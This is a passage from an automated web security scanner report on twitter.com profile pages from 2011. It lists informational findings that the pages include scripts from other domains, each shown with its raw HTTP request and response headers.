Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.379. http://twitter.com/TV38Boston

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /TV38Boston

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TV38Boston HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266035-61347-31781
ETag: "44a74d1afcf9bd83d65e21c61083ec35"
Last-Modified: Sat, 29 Jan 2011 01:53:55 GMT
X-Runtime: 0.01014
Content-Type: text/html; charset=utf-8
Content-Length: 19747
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.380. http://twitter.com/TechCrunch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /TechCrunch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-62897-59906
ETag: "d9c3c5e13ec1f2f0ecf37be4ab550c0a"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.00806
Content-Type: text/html; charset=utf-8
Content-Length: 54066
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.381. http://twitter.com/TechCrunch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /TechCrunch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234692-53339-28680
ETag: "7e0533a99283edc3093efb8a08ad5e79"
Last-Modified: Fri, 28 Jan 2011 17:11:32 GMT
X-Runtime: 0.00986
Content-Type: text/html; charset=utf-8
Content-Length: 54742
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.382. http://twitter.com/TheKateBosworth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /TheKateBosworth

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TheKateBosworth HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-80143-41969
ETag: "2e949d88eb257784b5bf1e7f6b09ebc5"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.01545
Content-Type: text/html; charset=utf-8
Content-Length: 27140
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.383. http://twitter.com/Trackgals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Trackgals

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Trackgals HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265994-35762-9331
ETag: "084cf3c9b164746f0254081f5cf026a3"
Last-Modified: Sat, 29 Jan 2011 01:53:14 GMT
X-Runtime: 0.00950
Content-Type: text/html; charset=utf-8
Content-Length: 52317
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.384. http://twitter.com/Trackgals/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Trackgals/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Trackgals/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-91506-33293
ETag: "1be6fcf55b971925b5829f3dff23d7be"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00823
Content-Type: text/html; charset=utf-8
Content-Length: 52701
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.385. http://twitter.com/_juliannemoore

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /_juliannemoore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_juliannemoore HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-32409-42560
ETag: "1befeb7740b62870da7fe07d809fb4d6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.01153
Content-Type: text/html; charset=utf-8
Content-Length: 34492
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
